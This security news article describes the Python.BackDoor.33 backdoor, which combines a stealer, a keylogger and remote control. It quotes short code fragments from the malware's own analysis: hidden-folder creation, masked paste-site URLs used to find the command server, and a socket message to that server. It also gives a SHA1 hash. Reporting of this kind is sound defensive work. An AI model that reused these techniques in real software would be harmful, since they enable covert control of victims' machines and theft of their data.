Friday, December 8, 2023

New Python Backdoor Allows Hackers to Control Your Infected Device Remotely

By Balaji

A Newly discovered backdoor that was written in Python has been detected as Python.BackDoor.33 with 3  interesting futures (stealer, keylogger, backdoor) that allow hackers to take full control of your infected device.

Recent threats are mainly had backdoor capabilities and that have many advance futures such as Keylogger, screen capture, webcam, Voice Recorder, File Browser, Remote  Command  Shell and install/uninstall Future.

Malware authors used Some advanced techniques to pack this Trojan to evade the Anti Virus detection.

It contains some packed malicious utility file that helps to run python scripts on windows ordinary executable Files. The functions of this malicious program are implemented in a file mscore.pyc.

Also Read : SYSCON Backdoor Uses FTP as a Command & Control Server

How Does This Python Backdoor Works

Once This Backdoor has infected the victim’s Device It saves a copy of the file on a Drive and modifies the Windows Registry key to confirm that, it has successfully launched and shut down the Script.

This Backdoor’s Main Malicious function will execute only after restarting the computer. Once system successfully restarted then this Trojan will Infect all the drives from C to Z.

Later It creates a hidden folder to copy it’s executable and a link to root directory that refers to malicious executable file and All files different from .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.

hidden_folder = os.path.join(drive, unichr(160))
if not os.path.exists(hidden_folder):
    os.mkdir(hidden_folder)
ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)

Trojan try to identify the IP address an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.


url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]
According to Dr.Web Reseracher, If the backdoor was successful in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response , it will download the Python scripts added to the Dr.Web virus databases as Python.BackDoor.35 from the C&C server and run them on the infected device . 

GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'

Malicious python scripts implement with 3 main Futures that is stealer, keylogger, backdoor and this Trojan will Perform following activities after infecting the victim’s machine.

  • Steal information from such browsers as Chrome, Opera, Yandex, Amigo, Torch, and Spark;
  • Perform the keylogger functions and make screenshots;
  • Download additional modules are written in Python and execute them;
  • Download files and save then on a media of the infected device;
  • Obtain contents of the specified folder;
  • “Travel” across folders;
  • Request system information.

SHA1:

  • 05cae95a3340395e363c2d6bddbc57833dbdb85c

Managed WAF Protection

Website

Latest articles

cyber security

Exploitation Methods Used by PlugX Malware Revealed by Splunk Research

PlugX malware is sophisticated in evasion, as it uses the following techniques to avoid...
cyber security

TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities

Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative...
cyber security

Bluetooth keystroke-injection Flaw: A Threat to Apple, Linux & Android Devices

An unauthenticated Bluetooth keystroke-injection vulnerability that affects Android, macOS, and iOS devices has been...
cyber security

Atlassian Patches RCE Flaw that Affected Multiple Products

Atlassian has been discovered with four new vulnerabilities associated with Remote Code Execution in...
cyber security

Reflectiz Introduces AI-powered Insights on Top of Its Smart Alerting System

Reflectiz, a cybersecurity company specializing in continuous web threat management, proudly introduces a new...
cyber security

SLAM Attack Gets Root Password Hash in 30 Seconds

Spectre is a class of speculative execution vulnerabilities in microprocessors that can allow threat...
cyber security

Akira Ransomware Exploiting Zero-day Flaws For Organization Network Access

The Akira ransomware group, which first appeared in March 2023, has been identified as...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Endpoint Strategies for 2024 and beyond

Converge and Defend

What's the pulse of Unified Endpoint Management and Security (UEMS) in Europe? Join us live to uncover the strategies that are defining endpoint security in the region.

Register Your Spot

Related Articles

Connect with GBHackers On Security

Join 70,000 Security Professionals

Stay safe online with free daily cybersecurity updates. Sign up now!

GBHackers on security is a highly informative and reliable Cyber Security News platform that provides the latest and most relevant updates on Cyber Security News, Hacking News, Technology advancements, and Kali Linux tutorials on a daily basis. The platform is dedicated to keeping the community well-informed and up-to-date with the constantly evolving Cyber World.

Menu

Contact US:

[email protected]